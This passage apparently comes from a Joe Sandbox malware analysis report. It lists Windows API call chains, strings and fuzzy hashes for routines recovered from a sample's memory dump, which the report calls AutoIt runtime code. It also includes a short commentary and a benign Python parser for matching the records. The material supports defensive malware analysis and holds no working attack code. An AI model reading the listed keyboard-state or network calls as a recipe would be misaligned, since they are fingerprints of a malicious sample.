• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00147D7A
• CoTaskMemFree.OLE32(00000000), ref: 00147D81
• CoTaskMemFree.OLE32(00000000), ref: 00147DD6
• CoUninitialize.OLE32 ref: 00147DDC
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
• String ID:
• API String ID: 2762341140-0
• Opcode ID: 6837e95374ef4a2095dd851970b8529882b2cbe4300c6c42dcc68fe570ae4751
• Instruction ID: 92dc91391101ce0b6d4bfb30635e0e28b04198364948787bf9aa8faf40481fdf
• Opcode Fuzzy Hash: 6837e95374ef4a2095dd851970b8529882b2cbe4300c6c42dcc68fe570ae4751
• Instruction Fuzzy Hash: DDC11C75A04219AFCB14DFA4C884DAEBBF9FF48304B148499E819DB762DB31ED45CB90
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00165504
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00165515
• CharNextW.USER32(00000158), ref: 00165544
• SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00165585
• SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0016559B
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001655AC
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend$CharNext
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1350042424-0
                                                                                                                                                                                                                                          • Opcode ID: de3f254771101ea455a65c96800a279278a03c6b248b597197ea494677d9c6ca
                                                                                                                                                                                                                                          • Instruction ID: e808ff3dd74cb0217f048afcd5a22f213127289a6a5873ab3791f06d33373b12
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de3f254771101ea455a65c96800a279278a03c6b248b597197ea494677d9c6ca
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9761AF35900609EFDF108F64CC84DFE7BBAEF09725F108145F965A7290DB748AA0DB60
Uniqueness

Uniqueness Score: -1.00%

APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0012FAAF
• SafeArrayAllocData.OLEAUT32(?), ref: 0012FB08
• VariantInit.OLEAUT32(?), ref: 0012FB1A
• SafeArrayAccessData.OLEAUT32(?,?), ref: 0012FB3A
• VariantCopy.OLEAUT32(?,?), ref: 0012FB8D
• SafeArrayUnaccessData.OLEAUT32(?), ref: 0012FBA1
• VariantClear.OLEAUT32(?), ref: 0012FBB6
• SafeArrayDestroyData.OLEAUT32(?), ref: 0012FBC3
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0012FBCC
• VariantClear.OLEAUT32(?), ref: 0012FBDE
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0012FBE9
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
• Opcode ID: b78b04029da89fb664a5386f677552226e478ed91536799f9dc4c649338e8bc2
• Instruction ID: fcf7ccefb8af18f6ccaea271b8786edb2f73124c219b83323907f9b252e7bf9b
• Opcode Fuzzy Hash: b78b04029da89fb664a5386f677552226e478ed91536799f9dc4c649338e8bc2
• Instruction Fuzzy Hash: A2415F35A002299FCB04DF64DC589FEBBB9EF08344F008079E945A7661CB70E956CFA0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetKeyboardState.USER32(?), ref: 00139CA1
• GetAsyncKeyState.USER32(000000A0), ref: 00139D22
• GetKeyState.USER32(000000A0), ref: 00139D3D
• GetAsyncKeyState.USER32(000000A1), ref: 00139D57
• GetKeyState.USER32(000000A1), ref: 00139D6C
• GetAsyncKeyState.USER32(00000011), ref: 00139D84
• GetKeyState.USER32(00000011), ref: 00139D96
• GetAsyncKeyState.USER32(00000012), ref: 00139DAE
• GetKeyState.USER32(00000012), ref: 00139DC0
• GetAsyncKeyState.USER32(0000005B), ref: 00139DD8
• GetKeyState.USER32(0000005B), ref: 00139DEA
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: e20338ecd4fa37cc1bf24aeb37082b6c93e55b2de59d0699676e0278765f6001
• Instruction ID: 06b3979a1c0fadfd17516127c8123c2853efb4c493d674e27ca19b7df7bed3b2
• Opcode Fuzzy Hash: e20338ecd4fa37cc1bf24aeb37082b6c93e55b2de59d0699676e0278765f6001
• Instruction Fuzzy Hash: B541C8346047CA6DFF3197A5C8053B6FEA06F11344F04805ADAC75A6C2DBE59DC8CBA2
Uniqueness

Uniqueness Score: -1.00%

APIs
• WSAStartup.WSOCK32(00000101,?), ref: 001505BC
• inet_addr.WSOCK32(?), ref: 0015061C
• gethostbyname.WSOCK32(?), ref: 00150628
• IcmpCreateFile.IPHLPAPI ref: 00150636
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 001506C6
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 001506E5
• IcmpCloseHandle.IPHLPAPI(?), ref: 001507B9
• WSACleanup.WSOCK32 ref: 001507BF
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
• Opcode ID: f7afa2527b96da69ee0eea1fdb3acc021897c31b639fffad1cafcbe827276e72
• Instruction ID: 738a43b897c235c848fefb7f8eab1509d145a716487d4cf6fe7de988dfe6b1aa
• Opcode Fuzzy Hash: f7afa2527b96da69ee0eea1fdb3acc021897c31b639fffad1cafcbe827276e72
• Instruction Fuzzy Hash: 7591AD35604201DFD321CF55C888F1ABBE0AF48318F1585A9E8A99F7A2D770ED49CF91
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                                                                          • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                          • API String ID: 707087890-567219261
                                                                                                                                                                                                                                          • Opcode ID: 6713ee605eb6a64a5e1cd652e87897a50358dc068a4b979ad620718c7fdd563d
                                                                                                                                                                                                                                          • Instruction ID: 377ed79006e3b9f24ace32fdbf3db322aa0f32752abab832c75a89ff891f349a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6713ee605eb6a64a5e1cd652e87897a50358dc068a4b979ad620718c7fdd563d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3751AE31A04116DBCF14DFA8C9418BEB3B5EF65725B214229E866FB2C5DB31DE44C790
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CoInitialize.OLE32 ref: 00153774
                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 0015377F
                                                                                                                                                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000017,0016FB78,?), ref: 001537D9
                                                                                                                                                                                                                                          • IIDFromString.OLE32(?,?), ref: 0015384C
                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 001538E4
                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00153936
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                          • API String ID: 636576611-1287834457
                                                                                                                                                                                                                                          • Opcode ID: e52d4c838a4476a0fd68c70da613b668e9eb8e184c28a218afad46808aa55620
                                                                                                                                                                                                                                          • Instruction ID: 4c0f894a993d2e78b65f05325ad4afddf562dea383072c816767a3fe26f1af9f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e52d4c838a4476a0fd68c70da613b668e9eb8e184c28a218afad46808aa55620
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F61A170608301EFD315DF64C849B6ABBE8EF48755F10090EF9A59B291D770EE48CBA2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 00148257
                                                                                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00148267
                                                                                                                                                                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00148273
                                                                                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00148310
                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00148324
                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00148356
                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0014838C
                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00148395
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                                                                                          • API String ID: 1464919966-438819550
                                                                                                                                                                                                                                          • Opcode ID: c1542dfaa70030e3df4d96cc1d8a14c96fa0d978b5da77e933c942e9413881a3
                                                                                                                                                                                                                                          • Instruction ID: 81911af70081f579a5b079810445a050bd982a59d13e128422f8ffe0c1794a8b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1542dfaa70030e3df4d96cc1d8a14c96fa0d978b5da77e933c942e9413881a3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2616A725043059FCB10EF64D840DAEB3E8FF89714F04892EF98987261EB31E945CBA2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 001433CF
                                                                                                                                                                                                                                            • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
                                                                                                                                                                                                                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 001433F0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LoadString$_wcslen
                                                                                                                                                                                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                                                          • API String ID: 4099089115-3080491070
                                                                                                                                                                                                                                          • Opcode ID: 1d3a9958d6c77143d62d0f772ce5b1b3778474ff4b5c88528033a78dcc9452b4
                                                                                                                                                                                                                                          • Instruction ID: 08416a4a830a3efe9f91af3cae729125ad8c366d2d01776aeb5c202566f876c7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d3a9958d6c77143d62d0f772ce5b1b3778474ff4b5c88528033a78dcc9452b4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F519E72900209BADF15EBE0DD42EEEB778AF14740F144066F505721A2EB712F98DB71
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

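The function records above are flat text, and the same record shape (APIs, Memory Dump Source, Similarity, Uniqueness) repeats for every routine the sandbox recovered from the process-4 dump loaded at 000D0000. The routines listed here (the Icmp*/Ping chain, the CoCreateInstance/IIDFromString wrapper with its "Failed to create object" strings, and the LoadStringW formatter with 'Line %d (File "%s"):') are interpreter-runtime code consistent with the report's finding that the binary is a compiled AutoIt script, so a practitioner wants to match them by fuzzy hash and move on to the script payload rather than reverse them. As an added example, and not Joe Sandbox's own code or tooling, the Python below parses records of this shape into structured objects so API chains, strings and image-relative call addresses can be queried and compared across reports. SAMPLE is a constructed, shortened copy of two records from this section; the class and function names are my own.

```python
"""Parser for Joe Sandbox per-function records (the APIs / Memory Dump Source / Similarity
blocks). Added example, not Joe Sandbox code; SAMPLE is a constructed, shortened copy of two records."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

SAMPLE = """\
APIs
• CoInitialize.OLE32 ref: 00153774
• CoCreateInstance.OLE32(?,00000000,00000017,0016FB78,?), ref: 001537D9
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 636576611-1287834457
• Instruction Fuzzy Hash: 9F61A170608301EFD315DF64C849B6ABBE8EF48755F10090EF9A59B291D770EE48CBA2
APIs
• LoadStringW.USER32(00000066,?,00000FFF,?), ref: 001433CF
  • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
Similarity
• API ID: LoadString$_wcslen
• String ID: Incorrect parameters to object property !$Line %d (File "%s"):
• API String ID: 4099089115-3080491070
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Uniqueness"}
LIST_FIELDS = {"API ID": "api_id", "String ID": "strings"}           # '$'-separated values
TEXT_FIELDS = {"API String ID": "api_string_id", "Instruction Fuzzy Hash": "instruction_fuzzy_hash"}
API_RE = re.compile(r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?(?P<name>\w+)\.(?P<module>\w+)"
                    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
KV_RE = re.compile(r"^(?P<key>[^:]+): ?(?P<value>.*)$")

@dataclass
class ApiCall:
    module: str
    name: str
    args: List[str]
    ref: int                    # call-site virtual address as printed after 'ref:'
    subcall_of: Optional[int]   # callee address when the report marks the call as made from a subcall

@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    api_id: List[str] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    api_string_id: str = ""
    instruction_fuzzy_hash: str = ""
    image_base: Optional[int] = None   # 'Offset:' of the source dump; None when the record has none

def parse_records(text: str) -> List[FunctionRecord]:
    """One FunctionRecord per 'APIs' header; bullet lines are routed by the section they sit under."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                cur = FunctionRecord()
                records.append(cur)
            section = line
            continue
        if not line or cur is None:
            continue
        body = line.lstrip("•").strip()
        m = API_RE.match(body) if section == "APIs" else KV_RE.match(body)
        if not m:
            continue
        if section == "APIs":
            args = [a for a in (m.group("args") or "").split(",") if a]
            cur.apis.append(ApiCall(m.group("module"), m.group("name"), args, int(m.group("ref"), 16),
                                    int(m.group("sub"), 16) if m.group("sub") else None))
            continue
        key, value = m.group("key"), m.group("value")
        if key == "Source File":
            off = re.search(r"Offset: ([0-9A-F]+)", value)
            cur.image_base = int(off.group(1), 16) if off else None
        elif key in LIST_FIELDS:
            setattr(cur, LIST_FIELDS[key], value.split("$"))
        elif key in TEXT_FIELDS:
            setattr(cur, TEXT_FIELDS[key], value)
    return records

def imported_names(rec: FunctionRecord) -> set:
    """'MODULE!Name' for every call in the record, subcalls included."""
    return {f"{c.module}!{c.name}" for c in rec.apis}

def rva(rec: FunctionRecord, ref: int) -> int:
    """Turn a printed 'ref:' address into an RVA using the dump's image base (ref addresses change with the load base)."""
    if rec.image_base is None:
        raise ValueError("record carries no image base")
    return ref - rec.image_base

def find_by_apis(records: List[FunctionRecord], required) -> List[FunctionRecord]:
    """Records whose call set contains every 'MODULE!Name' in `required`."""
    required = set(required)
    return [r for r in records if required <= imported_names(r)]
```

The ref addresses only mean something together with the dump's Offset (000D0000 here), which is why rva() refuses to guess when a record carries no Memory Dump Source; the Opcode and Instruction Fuzzy Hash values are the stable keys for matching the same routine across analyses of other samples built on the same runtime.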
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                                                                                                                                          • API String ID: 1256254125-769500911
                                                                                                                                                                                                                                          • Opcode ID: 906221041717d3029406822d686f5fae27f6f9bbcd1ace41cb27aecde1e5892a
                                                                                                                                                                                                                                          • Instruction ID: f50cdb614e0d3860e44bc515d89ddc86d00ee1adbb22f060c8e451f33b0e0286
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 906221041717d3029406822d686f5fae27f6f9bbcd1ace41cb27aecde1e5892a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 574126B2B080268BCB205F7DC9D25BE77A5AFA0754F254129E621DB286F731CC81C390
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 001453A0
                                                                                                                                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00145416
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00145420
                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 001454A7
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                                                                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                                                                                                          • API String ID: 4194297153-14809454
                                                                                                                                                                                                                                          • Opcode ID: 5e044795d6211b4748d94b46d3ed641f19c1f092758a2b68faf5cbb0e2c435f9
                                                                                                                                                                                                                                          • Instruction ID: 6cb02fd5c2ecb2f94ff47b895b60aa87095566129f6fd3658954c737861d70df
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e044795d6211b4748d94b46d3ed641f19c1f092758a2b68faf5cbb0e2c435f9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87319235A00604DFCB14DF68C984AAA7BB5EF55345F188065E805DF3A3EB71DD86CBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateMenu.USER32 ref: 00163C79
                                                                                                                                                                                                                                          • SetMenu.USER32(?,00000000), ref: 00163C88
                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00163D10
                                                                                                                                                                                                                                          • IsMenu.USER32(?), ref: 00163D24
                                                                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 00163D2E
                                                                                                                                                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00163D5B
                                                                                                                                                                                                                                          • DrawMenuBar.USER32 ref: 00163D63
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
